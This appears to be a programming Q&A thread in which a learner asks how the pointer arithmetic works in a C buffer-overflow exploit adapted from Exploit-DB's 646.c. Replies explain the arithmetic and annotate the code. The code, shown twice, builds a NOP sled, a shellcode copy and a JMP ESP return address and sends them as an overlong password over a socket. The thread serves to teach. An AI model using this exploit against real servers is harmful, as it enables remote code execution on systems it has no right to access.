# Need help understanding the pointer arithmetic and how the information is accessed

Tags: c

I am currently trying to teach an old dog a new trick and have read thru several books at this time so that I am able to become more familiar with simple c code. Also, I am tasked to try harder-I would not like to move forward within my course material until I understand this exercise.  In my search for answers I found this wonderful website that has helped answer a great many questions already; with the full understanding that I am absolutely over my head, I ask if anyone can help point out some things to confirm my understanding (or lack of) the pointer arithmetic and access of memory within the below code, which has been modified from the 646.c exploit within the exploit database.

```
void exploit(int sock) {
      FILE *test;
      int *ptr;//this is an unitialized pointer??
      char userbuf[] = "USER madivan\r\n";
      char evil[551];//allocating 551 bytes of memory
      char buf[3012];//allocating 3012 bytes of memory
      char receive[1024];
      char nopsled[] =  "\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90";
      memset(buf, 0x00, 3012);//zeroing out the buffer
      memset(evil, 0x00, 3001);//zeroing out the 'evil'
      memset(evil, 0x46, 551);//sets 551 bytes 
      ptr = &evil;//identify's the 'ptr' as &evil at that memory address?
      ptr = ptr + 657;  //adds 657 bytes to the 'ptr' @ &evil's    address
      memcpy(ptr, &nopsled, 16);//copies the pointers address             

             //divides by the nopsled and allows 16 bytes to be processed?
      ptr = ptr + 4;//at the previous lines memory address adds 4 bytes?

      memcpy(ptr, &shellcode, 317);this copies the memory address of the 

      // 'ptr' divides by the shellcode, then processes 317 bytes?
      *(long*)&evil[2610] = "\x8f\x35\x4a\x5f"; // 0x5f4a358f; // JMP ESP 
      //I have no idea how this line works.
      // banner
      recv(sock, receive, 1024, 0);
      printf("[+] %s", receive);
      // user
      printf("[+] Sending Username...\n");
      send(sock, userbuf, strlen(userbuf), 0);
      recv(sock, receive, 1024, 0);
      printf("[+] %s", receive);
      // passwd
      printf("[+] Sending Evil buffer...\n");
      sprintf(buf, "PASS %s\r\n", evil);
      //test = fopen("test.txt", "w");
      //fprintf(test, "%s", buf);
      //fclose(test);
      send(sock, buf, strlen(buf), 0);
      printf("[*] Done! Connect to the host on port 443...\n\n");
      }
```

The two books I have read discuss the basic parameters of c code; any help nudging me to more understanding is greatly appreciated.  Thank you to all who have replied to others within this community helping to clear up and identify where and how information is shared/stored/process/accessed.

Cheers!

Comment: It might be helpful to remember (or learn) that for any pointer *or array* `p` and integer `i` the expressions `*(p + i)` is the same as `p[i]`. In your case the expression `ptr + 657` will return a pointer to the 657:th element in the array pointed to by `ptr`.

Comment: Do you have a question?

Comment: The line `*(long*)&evil[2610] = "\x8f\x35\x4a\x5f";` is the most important part of the code, allowing arbitrary code execution. The string entered there is machine code for jumping to the stack pointer, where the program can then deliver the full payload of machine code.

Comment: As far as pointer arithmetic goes, it is essential to understand that pointer arithmetic is performed in terms of the size of the type of object pointed to (which is often more than one byte).  This goes hand in hand with the association between pointer arithmetic and array indexing.

Answer (score 0, accepted):

Here are some comments that describe what the code is doing. It will be difficult for you to get a specific answer without a specific question.

```
void exploit(int sock) {
    FILE *test;
    int *ptr;             // This is an unitialized pointer
    char userbuf[] = "USER madivan\r\n";
    char evil[551];       // Allocate 551 bytes of stack memory
    char buf[3012];       // Allocate 3012 bytes of stack memory
    char receive[1024];   // Allocate 1024 bytes of stack memory for 
                          // receiving data from the socket

    // Define an array of NOP instructions
    // These execute with no effect on the CPU
    char nopsled[] =  "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90";

    // Zero out the buffer at address buf
    memset(buf, 0x00, 3012);

    // Zero out the buffer at address evil and an EXTRA 2450 bytes
    // clearing part of the stack frame
    memset(evil, 0x00, 3001);

    // Fills the evil buffer with 551 bytes of value 0x46
    memset(evil, 0x46, 551);

    // Sets ptr to the address of the evil buffer
    ptr = &evil;

    // Sets ptr to the address 657 words (2628 bytes) past the first
    // element of evil. ptr now points into previous stack frames
    ptr = ptr + 657;

    // Copies the NOP instructions to the memory location pointed to
    // by ptr (16 NOP instructions, 4 words)
    memcpy(ptr, &nopsled, 16);

    // Sets ptr to point to the memory location after the NOPs
    ptr = ptr + 4;

    // Copies 317 bytes from shellcode to the memory location pointed
    // to by ptr
    memcpy(ptr, &shellcode, 317);

    // Copies the instruction JMP ESP to the location 2610 bytes past
    // the first element of evil. This allows shellcode to be executed
    *(long*)&evil[2610] = "\x8f\x35\x4a\x5f";

    // Continue with the rest of the routine
    recv(sock, receive, 1024, 0);
    printf("[+] %s", receive);
    // user
    printf("[+] Sending Username...\n");
    send(sock, userbuf, strlen(userbuf), 0);
    recv(sock, receive, 1024, 0);
    printf("[+] %s", receive);
    // passwd
    printf("[+] Sending Evil buffer...\n");
    sprintf(buf, "PASS %s\r\n", evil);
    //test = fopen("test.txt", "w");
    //fprintf(test, "%s", buf);
    //fclose(test);
    send(sock, buf, strlen(buf), 0);
    printf("[*] Done! Connect to the host on port 443...\n\n");
}
```

Comment: Thank you all for the explanations.  In time I will learn more and be able to formulate a better question.  Thank you all so much.

Answer (score 0):

Answers to the first few questions in the code:

Q1. Yes: it is an uninitialized pointer.

Q2. This assigns the address of `evil` to `ptr`.

Q3. `memcpy` does as its name suggests: copies data from one memory location to another; in this case, 16 bytes from `nopsled` to the address in `ptr`.

Q4. See above